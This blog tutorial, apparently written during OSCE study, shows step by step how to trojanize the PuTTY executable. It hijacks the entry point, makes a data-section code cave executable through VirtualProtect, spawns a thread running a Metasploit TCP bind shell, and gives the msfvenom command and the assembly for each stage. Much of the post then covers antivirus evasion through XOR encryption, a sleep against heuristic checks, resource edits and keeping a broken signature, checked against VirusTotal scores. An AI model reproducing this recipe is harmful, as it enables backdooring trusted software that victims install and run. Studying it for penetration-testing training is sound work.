Getting really low :: Backdooring an EXE
So recently I started my OSCE and part of it is backdooring an executable and doing some other things. There are loads of guides on the interwebz that basically just regurgitate the course content verbatim and claim it as their own. I won’t provide links but trust me, they are out there. These sites / blogs also tend to skip over really useful points and I hope that I manage to document a good solid process here.
So what's the aim here?
In a nutshell, we are going to make some shellcode (whilst letting MSFVenom and some Metasploit source do the heavy lifting). This shellcode will be a TCP Bind payload, not the Reverse TCP payload that's already documented to death on the internet. We will stash this shellcode in the Putty executable, divert Putty's genuine execution to the shellcode, and then fix it all back up and divert back to the legitimate code.
A TCP Bind payload has the annoying limitation that it will block the process until the attacker connects. To get around this, we will need to create a new thread to run this part of the payload. We will also try and encrypt the payload so we can evade some AV but this is expected to be fairly ineffective.
Here we go…
Prepare the environment
Metasploit Framework: Easiest approach is to download the Kali Linux iso and install it into a VMware Workstation VM.
Not so fast. First off, there is a decision to be made: should we find space for our malicious content, or create it? Creating space is much easier but can (supposedly) trigger AV, as it's a bit unusual to bolt extra sections onto an executable, so an existing big block of null bytes is preferred. To test this, let's check the AV detection rate for the vanilla Putty executable on VirusTotal.com, then modify the binary by adding a big block of null bytes to the end and check it again. If you haven't done this before, it is as simple as browsing to VirusTotal.com and uploading the executable.
Putty scores 0/61, as expected.
Now we will add a new section to the executable with LordPE and HxD. To do this, take a copy of the exe and then launch LordPE. All being well, we should have a "PE Editor" button on the right hand side which, when clicked, will launch a file dialogue for selecting our copy of Putty. After selecting the exe, a new dialogue appears with a lot of fields I won't pretend to understand; the important bit is clicking the Sections button on the right hand side. Both of these buttons can be seen in the screen below:
In the sections dialogue, we need to right click the last section and add a new one. We will then right click the new section and edit it so it has a VirtualSize and RawSize of 1000. These fields are in hexadecimal, so we are really saying this section will have 0x1000 (4096) bytes of actual data in the file and, on execution, the system should give the section 4096 bytes of memory.
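If the hex in those size fields trips you up, here's a quick Python sketch of the arithmetic. Python is used because the Metasploit build script later on is Python too. The PE format requires a section's raw size on disk (SizeOfRawData) to be a multiple of the header's FileAlignment, and it places sections in memory on SectionAlignment boundaries. The values 0x200 and 0x1000 below are common defaults that I'm assuming, not values read from Putty's header. The point is only that 0x1000 is already a multiple of both, so no rounding sneaks in.

```python
# Sizes typed into LordPE's section editor are hexadecimal.
SECTION_SIZE = 0x1000  # value entered as both VirtualSize and RawSize

# Assumption: typical PE defaults, NOT values read from Putty's own header.
TYPICAL_FILE_ALIGNMENT = 0x200
TYPICAL_SECTION_ALIGNMENT = 0x1000


def align_up(value: int, alignment: int) -> int:
    """Round value up to the next multiple of alignment (a power of two)."""
    if alignment <= 0 or alignment & (alignment - 1):
        raise ValueError("alignment must be a positive power of two")
    return (value + alignment - 1) & ~(alignment - 1)


if __name__ == "__main__":
    print(SECTION_SIZE)  # 4096
    # 0x1000 needs no rounding under either typical alignment.
    print(align_up(SECTION_SIZE, TYPICAL_FILE_ALIGNMENT) == SECTION_SIZE)
    print(align_up(SECTION_SIZE, TYPICAL_SECTION_ALIGNMENT) == SECTION_SIZE)
    # An odd size, by contrast, would be padded up to the next 0x200 boundary.
    print(hex(align_up(0x1234, TYPICAL_FILE_ALIGNMENT)))  # 0x1400
```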
The screens below cover this, I have renamed my section to .Simon.
With this done, close the section editor and click “Save” and “OK” in the previous dialogue (just visible in the “add section” screen above).
Before we leave LordPE, make sure to use the “Rebuild PE” function by clicking the button on the right and then selecting our file again.
The next step is to open the executable and actually add the extra 4096 bytes of data that we have configured to be there. This is easy enough with HxD so launch it and open the newly modified executable. Within HxD, we scroll down to the very last byte and click it so that our cursor is blinking within it and then add 0x1000 (4096) bytes of 00’s to the end. Hopefully the screens below cover that should you need to see it.
Once we have added these extra bytes we will need to save the file and use LordPE again to rebuild the executable with the “Rebuild PE” function just as we did before. Saving the file in HxD should change all those Red 00’s to black.
After all of this, we should have a new putty executable that still runs but which has 4096 bytes of executable memory that we can store shellcode in. So, will it still score a zero on VirusTotal? There is nothing malicious in the file yet…
Well that answers that question!
So the next thought is whether we can find somewhere within the existing sections to hold our malicious shellcode. Within LordPE we can view the flags configured for a section, and we will need both execute and write permissions for this backdoor: this is a self-decrypting payload, so it will need to execute and also write the decrypted code back into memory. We can view the flags for each section by editing the section in LordPE and then clicking the "…" next to the flags field. Most of this is covered in the next screen.
The .text section looks most promising as it already has execute permissions, but unfortunately it does not have write permissions. We can change this by simply ticking the "Writable" box and saving the changes back to the executable, but immediately we find…
Okay, so we can't make the .text section writeable, at least not via the PE header. We could make it writeable after the program has started by calling the VirtualProtect function, though, so it's not the end of the road just yet. The other option is making the .data section executable, as that already has write permissions. This is again done with LordPE in the same manner, so it is worth seeing how this affects the detection rate on VirusTotal. Unfortunately it is much the same, but if the providers listed aren't a problem then maybe you could just go with this simpler approach?
Firing up Immunity Debugger
The next step is to look for somewhere to store our payload. Hopefully we can squeeze it all in the text section as it is executable so we only need to worry about making it writeable. If we can’t do this, we can hopefully squeeze in a STUB that will make an area of the data section executable so we can store our payload there and then jump to it from the end of the STUB.
There are tools for automating this search, but we can do it ourselves by launching Putty in Immunity Debugger and looking for big blocks of null bytes (00's). To do this, launch Immunity Debugger (as an admin) and open the Putty executable. When the activity stops in Immunity, we have to press the play button once to tell Immunity to pass the first exception (not sure why it is even there?). Immunity will then pause at the program's main entry point, which is where we want to hijack the code execution. If you want to hijack an executable at a custom point, say when a particular event occurs or a button is clicked, you should pause the program there to ensure any caves you find are still caves at the point you need to use them. To check whether we are at the program entry point, keep checking the log window (view>log), as it should read "Program entry point".
Ok, so now we are at the program entry point. This is where we want to divert execution to our payload, and it is also where we will eventually return execution to, so we need to be able to set everything back to normal before we hand control back. In Immunity, go to view>memory and find the .text section of Putty in the list. Double clicking this section will open a new window showing its raw contents. We are looking for a big block of null bytes (00's), which you can see right at the end of the section. Unfortunately this cave isn't very big, but we can use it to host a little bit of code which will make one of the larger caves in the data section executable.
To begin, let's get a memory address from the start of this short code cave so we can redirect the execution flow to it. First we need to know whether addresses in Putty will stay put: the command "!mona modules" shows all the loaded modules and some useful information on them, including whether they use ASLR.
As we can see, all modules except Putty utilise ASLR. This means their memory addresses (or at least the first byte) will be randomised every time they are reloaded (system reboot). Fortunately Putty wasn’t compiled with support for this so we can use fixed memory addresses when referencing memory locations.
Ok, so the memory address chosen in my case is 0045CF87. At this location, right click the null byte and select Assemble from the pop-up menu. Type INT3 here for an interrupt instruction and click Assemble. If our redirect works, the program should pause here because of the interrupt instruction we have placed at this address. At this point, it's probably worth saving this back to the executable and restarting it.
To do this, we need to find our instruction in the CPU window so either find that window or go view>CPU. When there; scroll right down to our INT3 instruction, right click it and select “Copy To Executable>Selection”. A new window will open, close it off and follow the save prompt to save a new copy of Putty. With this done, use the open dialogue within Immunity to launch the new version of Putty. From this point on, I’ll just say we should save our changes so nip back here if you need to.
So hopefully we are back to the main entry point and we should see the first three instructions as:
PUSH 60 // 6a60
PUSH 00478108 // 6808814700
CALL 00457204 // e808210000
I have included the byte values of those instructions to show an important point. A JMP with a 32-bit relative offset takes 5 bytes, so if we overwrite the 2-byte PUSH 60 with it, we will overflow into and break the following instruction. PUSH 00478108 is exactly 5 bytes, so we will overwrite the second instruction rather than the first. The instruction we want is a jump to our interrupt, so right click the PUSH 00478108 instruction and select Assemble. This time we will enter "jmp 0045CF87" and assemble it. If this worked, hitting the play button should let execution run and then pause again once it hits our interrupt. If it did, go back to where you swapped the PUSH for a JMP and save a copy of the executable.
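To see why the swap fits byte for byte, it helps to know how E8 (CALL) and E9 (JMP) encode their target. The byte is followed by a signed 32-bit displacement, which the CPU adds to the address of the next instruction. Below is a small Python sketch of that arithmetic. I've inferred the instruction addresses from the listing rather than read them from a debugger. The JMP back to 004550F7 "after the one we overwrote" puts PUSH 00478108 at 004550F2, and the CALL immediately after it at 004550F7.

```python
import struct


def rel32(instr_addr: int, target: int, length: int = 5) -> int:
    """Signed displacement for a 5-byte E8/E9 instruction at instr_addr."""
    disp = target - (instr_addr + length)  # relative to the NEXT instruction
    if not -2**31 <= disp < 2**31:
        raise ValueError("target out of rel32 range")
    return disp


def encode_jmp_rel32(instr_addr: int, target: int) -> bytes:
    """E9 opcode followed by the little-endian signed displacement."""
    return b"\xE9" + struct.pack("<i", rel32(instr_addr, target))


def decode_rel32_target(instr_addr: int, encoded: bytes) -> int:
    """Recover the absolute target of a 5-byte E8/E9 instruction."""
    (disp,) = struct.unpack_from("<i", encoded, 1)
    return (instr_addr + 5 + disp) & 0xFFFFFFFF


if __name__ == "__main__":
    # CALL 00457204 encoded as e808210000, assumed to sit at 004550F7:
    print(hex(decode_rel32_target(0x004550F7, bytes.fromhex("e808210000"))))
    # "jmp 0045CF87" assembled over PUSH 00478108 (6808814700) at 004550F2:
    print(encode_jmp_rel32(0x004550F2, 0x0045CF87).hex())  # e9907e0000, 5 bytes
```

Both the PUSH it replaces and the JMP are 5 bytes, so nothing after the patched instruction is disturbed.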
From now on I'll document the instructions we will use, but it's up to you to assemble them into the binary.
Eventually we will be using shellcode from Metasploit to deliver the TCP bind shell so we need to make sure we can save the current state of the CPU stack and flags so they can be restored after all the malicious stuff has happened. Sometimes this might not be necessary but it’s always best to tidy up. The method that we will use to do this is to save all of the registers and CPU flags to the stack, then save the stack pointer to memory. For this we will need 4 bytes of writable memory so go look for one in the data section. I’ll go for 0047B090.
So now, rather than jumping to an interrupt, we will jump to our backup and restore code which will use the assembly commands below. I’ll use “//” to denote comments, don’t assemble that bit!
PUSHAD // Push register values to the stack
PUSHFD // Push CPU flags to the stack
MOV [0047B090],ESP // Copy ESP value into the writable memory address we found in the data section
NOP // 5 NOPs (instructions that do nothing) which we will use later on
NOP
NOP
NOP
NOP
MOV ESP,[0047B090] // Copy the saved ESP value back into ESP
POPFD // Pop the CPU flags from the stack
POPAD // Pop the registers from the stack
PUSH 00478108 // This is the command we overwrote to jump here from the entry point
JMP 004550F7 // JMP to next instruction after the one we overwrote.
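Why restore ESP from memory instead of trusting the stack? Whatever we run in between may leave the stack unbalanced. Reloading the saved ESP puts us right back on top of the PUSHFD/PUSHAD frame regardless. Here's a toy Python model of just those instructions. It's a simplified sketch, not an emulator, and the starting register values are made up. It shows that the saved ESP sits 36 bytes below the original (8 registers plus EFLAGS, 4 bytes each), and that registers and flags come back intact even after junk pushes.

```python
MASK = 0xFFFFFFFF
PUSHAD_ORDER = ["EAX", "ECX", "EDX", "EBX", "ESP", "EBP", "ESI", "EDI"]


class Cpu:
    """Toy 32-bit stack model: just enough for PUSHAD/PUSHFD/POPFD/POPAD."""

    def __init__(self, regs, eflags):
        self.regs = dict(regs)
        self.eflags = eflags
        self.mem = {}

    def push(self, value):
        self.regs["ESP"] = (self.regs["ESP"] - 4) & MASK
        self.mem[self.regs["ESP"]] = value & MASK

    def pop(self):
        value = self.mem[self.regs["ESP"]]
        self.regs["ESP"] = (self.regs["ESP"] + 4) & MASK
        return value

    def pushad(self):
        original_esp = self.regs["ESP"]  # PUSHAD stores ESP as it was before PUSHAD
        for name in PUSHAD_ORDER:
            self.push(original_esp if name == "ESP" else self.regs[name])

    def popad(self):
        for name in reversed(PUSHAD_ORDER):
            value = self.pop()
            if name != "ESP":  # POPAD discards the saved ESP value
                self.regs[name] = value

    def pushfd(self):
        self.push(self.eflags)

    def popfd(self):
        self.eflags = self.pop()


def run_backup_restore(junk_pushes=3):
    start = {"EAX": 1, "ECX": 2, "EDX": 3, "EBX": 4,
             "ESP": 0x0012FF80, "EBP": 0x0012FF94, "ESI": 7, "EDI": 8}  # made-up values
    cpu = Cpu(start, eflags=0x246)
    cpu.pushad()
    cpu.pushfd()
    saved_esp = cpu.regs["ESP"]          # MOV [0047B090],ESP
    for i in range(junk_pushes):         # stand-in for code that unbalances the stack
        cpu.push(0xDEAD0000 + i)
    cpu.regs["EAX"] = 0x41414141         # ...and clobbers a register and the flags
    cpu.eflags = 0x202
    cpu.regs["ESP"] = saved_esp          # MOV ESP,[0047B090]
    cpu.popfd()
    cpu.popad()
    return start, cpu, saved_esp


if __name__ == "__main__":
    start, cpu, saved = run_backup_restore()
    print(cpu.regs == start, hex(cpu.eflags), hex(start["ESP"] - saved))  # True 0x246 0x24
```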
Okay, so now we have a Putty that is pretty broken, so let's fix it and make sure what we have done so far isn't flagging with antivirus. Putty now generates an error because saving our stack pointer to that memory location overwrote bytes the program presumably expects to still be zero. We could look for another location and try again, or just make sure we wipe it clean when we are done.
To wipe it clean, we can use another instruction before the final jmp:
MOV DWORD [47B090],0 // We specify DWORD here so it fills all four bytes. We are basically moving “0” to those four bytes.
In Immunity, you should see your code looking a lot like the screen grab below.
With this tweak, Putty should launch as normal and we have our backup and restore code in place.
This post was never meant to be about evading AV, but it goes hand in hand with backdooring an executable, so I don't think it is appropriate to ignore it. Annoyingly, somehow these amendments trigger 6/61 AV engines on VirusTotal. This really threw me, so I started playing around, and these engines still detect it even if we remove all of the instructions so that we just jump down and back up.
Frustrated by this, I swapped the jmp instruction for a call instruction which makes it a touch more complicated as we have to correct the stack from the call instruction. For reference I have included this bit of code below but alas it didn’t make any difference to our detection rate!
MOV DWORD [ESP],00478108 // overwrite the automatic return address with the value that needs to be on the stack
PUSH 004550F7 // Push our return address back to the stack
RETN // Return to the address on the stack, which pops it off and leaves the stack how it needs to be
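The stack fix-up for the CALL variant is easier to believe once you trace it. Below is a tiny Python model using a list as the stack, with the top as the last item. It skips the PUSHAD/POPAD frame in the middle and just checks one thing: the CALL + MOV + PUSH + RETN sequence leaves the same stack and the same next instruction as the original PUSH 00478108 followed by falling through to 004550F7. Placing the CALL at 004550F2 is my assumption, mirroring where the JMP went.

```python
DISPLACED_PUSH = 0x00478108  # value the original PUSH put on the stack
RESUME_ADDR = 0x004550F7     # instruction after the one we overwrote


def call_variant(stack, call_site=0x004550F2, call_len=5):
    """CALL cave; MOV DWORD [ESP],00478108; PUSH 004550F7; RETN."""
    stack = list(stack)
    stack.append(call_site + call_len)  # CALL pushes its return address
    stack[-1] = DISPLACED_PUSH           # MOV DWORD [ESP],...: overwrite it
    stack.append(RESUME_ADDR)            # PUSH 004550F7
    eip = stack.pop()                    # RETN pops the top into EIP
    return stack, eip


def original_code(stack):
    """PUSH 00478108, then execution simply continues at 004550F7."""
    stack = list(stack)
    stack.append(DISPLACED_PUSH)
    return stack, RESUME_ADDR


if __name__ == "__main__":
    before = [0x60]  # left by the preceding PUSH 60
    print(call_variant(before) == original_code(before))  # True
```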
My next thought was to strip the (now broken) digital signature from the file in case that was being used by the AV engines. Doing this increased our detection rate to 11/61! The world of AV is definitely a strange one, and it looks like having a broken digital signature is better than none at all. Rebuilding the PE in LordPE dropped the detection rate down to 10, so there is something in the section headers causing (at least some of) the problem. Then again, if we use LordPE or CFF to rebuild the headers on our original signed Putty, the detection rate jumps straight back up to 11! Growing ever more frustrated, I took the original vanilla Putty and rebuilt the PE, and that scored 7/61!
Switching back to the original putty and reapplying our modifications without rebuilding the PE header brings the detection rate down to 5/61. Looks like we will have to settle for this right now but feel free to drop something in the comments if you know of a way of getting the detection rate even lower!
OK, let's move on. Now we need to find a nice big block of zeros in the data section that we can use to hold our payload. I'll leave this as an exercise for the reader as we have already done it once. I found a nice block starting at 0047CC00 which gives us just short of 0x1000 bytes (4096 in decimal), all the way up to 0047DC00. As discussed earlier, this is a writeable but not executable block of memory, so we need to fix that. This can be done with a call to the VirtualProtect function in Kernel32. How do I know this? Because I googled it, obviously!
There are a number of complicated ways to find the address of the VirtualProtect function (remember it moves around a lot because of ASLR). We won’t be using them. We won’t need to.
Mona has a command called ropfunc which automatically finds pointers to known useful functions at non-ASLR memory addresses. We know that Putty is compiled without ASLR support, so if it has a pointer to VirtualProtect then we can just use that to make our call. Running the command returns exactly what we need.
When we get the pointer (0045D194), we restart Putty a few times to make sure it's a genuine static reference. It is, so we have the location of VirtualProtect!
With this we can build our code to call VirtualProtect and make our second cave in the data section executable. To do this, we need to know what parameters VirtualProtect requires so we can push them onto the stack in right-to-left order and make the call. To find these, Google it! The MSDN page for VirtualProtect is the one you want.
Hopefully you read that MSDN article. It doesn’t matter if you couldn’t quite understand it as I’ll document it here. Remember, we are working right to left.
lpflOldProtect [out] :: A pointer to a variable that receives the previous access protection of the first page in the region. If this is NULL or doesn't point to a valid variable, the function fails. We can get such an address on the stack by making some room on it and then taking the address from the ESP register.
flNewProtect [in] :: The memory protection option to apply to the code cave, for example PAGE_EXECUTE_READWRITE (0x40).
dwSize [in] :: This value determines how many bytes from the start address will get modified.
lpAddress [in] :: This is the start address of the code cave.
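One subtlety with lpAddress and dwSize: protection is applied per page, not per byte. MSDN says every page containing at least one byte of the requested range is affected. Our cave at 0047CC00 is not page-aligned, so its 0x1000 bytes straddle two 4 KiB pages, and VirtualProtect changes 0x2000 bytes of the data section. Here's a short Python sketch of that calculation. It assumes 4 KiB pages and treats the range as ending just before lpAddress + dwSize; for this cave, including that end byte lands on the same second page anyway.

```python
PAGE_SIZE = 0x1000  # 4 KiB pages on 32-bit Windows


def affected_pages(lp_address: int, dw_size: int, page_size: int = PAGE_SIZE):
    """Base addresses of every page touched by [lp_address, lp_address + dw_size)."""
    if dw_size <= 0:
        raise ValueError("dw_size must be positive")
    first = lp_address & ~(page_size - 1)
    last = (lp_address + dw_size - 1) & ~(page_size - 1)
    return list(range(first, last + 1, page_size))


if __name__ == "__main__":
    pages = affected_pages(0x0047CC00, 0x1000)
    print([hex(p) for p in pages])  # ['0x47c000', '0x47d000']
    print(hex(len(pages) * PAGE_SIZE))  # 0x2000 bytes actually change protection
```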
So lets put the code together:
push 0 // Make room on the stack for lpflOldProtect
push esp // lpflOldProtect: ESP currently points at that 0
push 40 // flNewProtect: PAGE_EXECUTE_READWRITE (0x40), i.e. make it rwx
push 1000h // dwSize: 0x1000, so 4096 bytes
push 0047CC00 // lpAddress: start of the data section code cave
CALL DWORD PTR DS:[45D194] // Call VirtualProtect through the static pointer
pop EAX // Pop the lpflOldProtect slot (now holding the old protection) off the stack
JMP 0045CF94 // JMP to our restore code and on to Putty
If we put a breakpoint on the final JMP, we should see the stack after the VirtualProtect function has returned.
As we can see, the top DWORD of the stack is the number 8. VirtualProtect's own return value (nonzero on success) comes back in EAX. The 8 is what the function wrote through lpflOldProtect into the slot we pushed, and MSDN tells us this is the protection the region had before the change. So what does 0x(00000)08 mean?
According to MSDN's memory protection constants, 0x08 is PAGE_WRITECOPY, which looks probable to me for a writable data section! Let's take a quick look at VirusTotal and see how we are getting on…
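If you'd rather not squint at the MSDN table each time, the base memory protection constants fit in a small lookup. Here's a Python sketch listing the documented base values plus the three common modifier bits (PAGE_GUARD, PAGE_NOCACHE, PAGE_WRITECOMBINE). It covers only those, so other rarer flags are not decoded.

```python
PAGE_PROTECTION = {
    0x01: "PAGE_NOACCESS",
    0x02: "PAGE_READONLY",
    0x04: "PAGE_READWRITE",
    0x08: "PAGE_WRITECOPY",
    0x10: "PAGE_EXECUTE",
    0x20: "PAGE_EXECUTE_READ",
    0x40: "PAGE_EXECUTE_READWRITE",
    0x80: "PAGE_EXECUTE_WRITECOPY",
}
PAGE_MODIFIERS = {0x100: "PAGE_GUARD", 0x200: "PAGE_NOCACHE", 0x400: "PAGE_WRITECOMBINE"}


def describe_protection(value: int) -> str:
    """Turn a protection DWORD (e.g. from lpflOldProtect) into constant names."""
    base = value & 0xFF
    if base not in PAGE_PROTECTION:
        raise ValueError(f"unknown base protection {base:#x}")
    names = [PAGE_PROTECTION[base]]
    names += [name for bit, name in PAGE_MODIFIERS.items() if value & bit]
    return " | ".join(names)


if __name__ == "__main__":
    print(describe_protection(0x08))  # PAGE_WRITECOPY (the old value we got back)
    print(describe_protection(0x40))  # PAGE_EXECUTE_READWRITE (what we asked for)
```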
Cool, no change there then.
And for reference, your shellcode should be looking a little something like this…
To test this has worked, lets add a jump instruction to send execution to our new executable data code cave and then just jmp straight back to test execution.
Hopefully you can work out these two jump instructions now so I won’t document it here! For info, it works like a charm.
So now we have the shellcode that saves our current state, makes another writeable code cave executable, then puts everything back together and carries on to launch Putty as normal. Now for the malicious stuff!
As mentioned before, we will be using the TCP Bind payload from Metasploit, so we will need to create a new thread to hold the payload. I found this out through trial and error, so if you want you can go on the same journey of discovery by skipping the next section.
Spawning a new thread
The shellcode for this is a little complicated, as !mona ropfunc returns no usable pointers to CreateThread. Instead, we will generate the thread-spawning shellcode with Metasploit. To do this, we need to locate the source code files in Kali (or BackTrack) and then build the shellcode. To find the source code, run the command:
locate .asm | grep thread
This should output some file paths; we need to change directory into the x86 folder, which contains the Python build script. For me that's:
Once there we can generate the shellcode with:
python build.py createthread
With this done, you should get your shellcode.
To make this more usable, let's strip out all the characters we don't want, leaving just the hex. I won't explain the ins and outs of the grep, sed and tr commands, but they leave a single string of hex for us to copy and paste into Immunity Debugger.
python build.py createthread | grep '"' | sed 's/[^A-Z0-9]//g' | tr -d '\n'
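If the pipeline looks like line noise, here's the same filtering written out step by step in Python. It assumes build.py prints the bytes as uppercase \xNN escapes inside double-quoted lines, which is what the A-Z filter implies. That assumption matters: the lowercase "x" in each escape is stripped only because it falls outside A-Z, and lowercase hex digits would be stripped too. That is why the msfvenom one-liner later switches to [^a-f0-9].

```python
import re


def strip_to_hex(build_output: str) -> str:
    """Python equivalent of: grep '"' | sed 's/[^A-Z0-9]//g' | tr -d '\\n'"""
    quoted = [line for line in build_output.splitlines() if '"' in line]  # grep '"'
    cleaned = [re.sub(r"[^A-Z0-9]", "", line) for line in quoted]          # sed
    return "".join(cleaned)                                                # tr -d '\n'


if __name__ == "__main__":
    sample = 'buf =\n"\\xFC\\xE8\\x89"\n"\\x00\\x60"\n'  # made-up sample output
    print(strip_to_hex(sample))  # FCE8890060
```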
For me, the shellcode was returned as:
To paste this into Immunity, find your way to the .data section code cave, select a good number of lines (100 or so), then right click and select Binary > Paste. If you find the shellcode goes right up to the end of the selection, then you have probably truncated it. Right click, select Binary > Fill with 00's and try again.
Once this is pasted in, we should see all the instructions. Take a moment to try and orient yourself in this code. It's a good idea to add a breakpoint on every call instruction and just after it, so you can run the code and keep breaking at the important bits.
The last 2 instructions are a RETN and a POP EAX, neither of which we need, as we are jumping here rather than calling the code. We can fill these back with 00's and assemble an instruction to jump back to our restore code.
Now to work out how this shellcode creates a thread. There is no easy way to do this other than placing some breakpoints and running through the code. I often find it useful to put breakpoints immediately after call instructions and after the conditional jump of a loop. The latter is particularly useful, as a loop can quite often go round hundreds of times!
After a while you will land on the JMP instruction to Kernel32.CreateThread. So rather than call this function, the stack of parameters is manually put together by the shellcode and a jmp instruction is issued instead. We can see the parameters on the stack in the screen grab below.
At the top of the stack we have our return address for the function (which we can swap out for a fixed address to our restore code), then a couple of DWORD 0's and a memory address, 0047CCA6. As it happens, this address pointed to the POP EAX instruction we overwrote earlier, so this must be the new thread's start address. Hopefully this is starting to make sense now: this shellcode is designed to be called, so that everything after the final RETN instruction (which we overwrote) is launched in the new thread! Well, modifying the shellcode may help with AV evasion, so let's continue on this path.
Looking at the instructions, we can see some push commands that assemble what looks like the stack on the right hand side. Key to this is the LEA instruction, which determines the start of the new thread by calculating an address at an offset from EBP. We can swap this for a PUSH instruction that puts a fixed address onto the stack.
I went for:
With these changes in place, we see that we have a new thread with an entry point at 0047CCB0! Putty is also broken if you try and launch it but that is because our new thread bins out. We are also up to 11/61 on VirusTotal so let’s try and throw some shellcode in and see how we get on.
Before we proceed, your code should look something like this:
The bind payload
We will generate the shellcode with the command:
msfvenom -p windows/shell_bind_tcp EXITFUNC=THREAD | grep '"' | sed 's/[^a-f0-9]//g' | tr -d '\n'
Then just like before we will copy and paste it in, starting at 0047CCB0.
With that pasted in and saved, launching the executable presents us with…
Success! But how about VirusTotal?
I don’t think that’s too bad really, we avoid some of the big players like Sophos, Kaspersky, Comodo, Eset, McAfee, Symantec, Panda. But can we do better?
Well the next day I ran the same scan and it scored 31/61! Just goes to prove the danger of using VirusTotal and getting your binaries distributed to the AV vendors. If we then use ResHacker to modify the file attributes (Version, ProductName etc) then we bring the score back down to 17/61. Some providers are still detecting that bind shell though so we need to try and obfuscate it.
To do this, we can encrypt it by XORing the code cave we created in the data section and adding some decryption code in the text section. If we didn't have room in the text section we could put the decryption code in the data section, but we do, and it's tidier this way. This sounds more complicated than it is, so I'll jump straight into some example code.
MOV EAX, 0047CC00 // Move the start address of our code cave into the EAX register
XOR DWORD [EAX], DEADBEEF // XOR the DWORD at the address held in EAX with DEADBEEF
INC EAX // Increment EAX 4 times, as the XOR DWORD covered 4 bytes
INC EAX
INC EAX
INC EAX
CMP EAX, 0047CE03 // Compare EAX with the address of the end of our malicious code
JLE 0045CFD0 // If we aren't past the end of our cave, jump back to the XOR command and go again
JMP 0047CC00 // If we didn't take the JLE (because EAX is now high enough), jump to our data code cave to begin execution
So we are using EAX to hold the address of the current 4 bytes of memory to be encrypted. We XOR those 4 bytes and then increment EAX by 4 so it points at the next DWORD. If this new address is not past the end of our code cave, we go back and loop again; otherwise we jump to the code cave, which has now been XORed in full.
Once this is in and working, put a breakpoint on the last JMP instruction and, when you get there, save the encrypted .data section. Restart the application, and the same code will now decrypt the shellcode and execute it. This is a trivial cipher using a symmetric key, so encryption and decryption are both done with the same code.
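Two details of that loop are worth checking on paper: exactly which bytes it covers, and why running it twice gets you back where you started. Below is a Python sketch that mirrors the loop's control flow: XOR, add 4, then compare against 0047CE03 with JLE. It also applies the key as a little-endian DWORD, the way XOR DWORD [EAX] does on x86. It is a model of the stub for reasoning about it, not a replacement for it.

```python
import struct


def xored_addresses(start: int, end_cmp: int, step: int = 4):
    """Addresses touched by: XOR [EAX]; INC EAX x4; CMP EAX,end; JLE loop."""
    addrs = []
    eax = start
    while True:
        addrs.append(eax)      # XOR DWORD [EAX],key
        eax += step            # INC EAX x4
        if not eax <= end_cmp:  # JLE is signed, fine for addresses below 0x80000000
            break
    return addrs


def xor_dwords(data: bytes, key: int) -> bytes:
    """XOR each little-endian DWORD of data with key (length must be a multiple of 4)."""
    if len(data) % 4:
        raise ValueError("length must be a multiple of 4")
    out = bytearray(data)
    for off in range(0, len(out), 4):
        (dword,) = struct.unpack_from("<I", out, off)
        struct.pack_into("<I", out, off, dword ^ key)
    return bytes(out)


if __name__ == "__main__":
    addrs = xored_addresses(0x0047CC00, 0x0047CE03)
    print(len(addrs), hex(addrs[-1]))  # 129 0x47ce00 -> bytes 0047CC00..0047CE03
    print(xor_dwords(bytes(4), 0xDEADBEEF).hex())  # efbeadde: key bytes in memory order
    sample = bytes(range(16))
    print(xor_dwords(xor_dwords(sample, 0xDEADBEEF), 0xDEADBEEF) == sample)  # True
```

The last DWORD XORed starts at 0047CE00, so the loop covers 0x204 bytes. Anything you paste past 0047CE03 would need a larger compare value.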
That brings us down to 15/61!
At this point I suspect we are triggering heuristic checks which are basically running Putty and waiting for the bind shell to execute. To counter this, we will introduce a short sleep before the payload triggers. Now I couldn’t find any pointers to KERNEL32.Sleep so I just assembled the command CALL KERNEL32.Sleep which isn’t ideal and probably makes this OS specific. There is shellcode out there to address this problem but I didn’t want to go down that rabbit hole just yet.
So to call KERNEL32.Sleep, we first need to push the number of milliseconds we want it to wait onto the stack. I went for 0x1000, which is 4096, or just over 4 seconds. So the full code for assembly looked like:
I put this after the decryption STUB but before the create thread shellcode. As our create thread shellcode didn't flag AV, the sleep could sit after it and not delay the rest of the application, but that meant a lot of moving code around and I really wanted to wrap this up! So what's the score on the doors?
Not bad, and I must say I’m impressed with AVG for its detection rate throughout this process!
Again, if we strip that (invalid) digital signature out then the score climbs back up to 11. So top tip there, keep dodgy broken signatures in place!
Well I hope you learnt a lot there about shellcoding and I haven’t missed little bits out that really mean a lot. My aim here was to provide a good solid well reasoned guide that anyone can pick up, follow and (importantly) understand why we make certain decisions along the way.
Any feedback, drop it in the comments.